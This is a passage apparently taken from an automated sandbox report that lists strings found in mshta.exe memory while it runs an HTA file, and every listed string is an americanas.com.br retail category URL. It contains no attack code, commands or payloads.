Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/xbox-series-s
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/agro-industria-e-comercio?chave=pfm_home_agro_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores/aquecedores-de-ar?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climameta.large
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condici
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535690117.000000000533F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_home_ar_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/artesanato?chave=pfm_home_artesanato_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/artigos-de-festas?chave=pfm_home_festas_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivometa.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=pfm_home_automotivo_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/bebes?chave=pfm_home_bebes_menu
Source: mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelos
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosmeta.large
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/bonecas/reborn
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542171761.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/lego
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_cameba
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_camebameta.largemeta.large.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cameras-e-drones?chave=pfm_home_cameras_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/casa-e-construcao?chave=pfm_home_construcao_menu
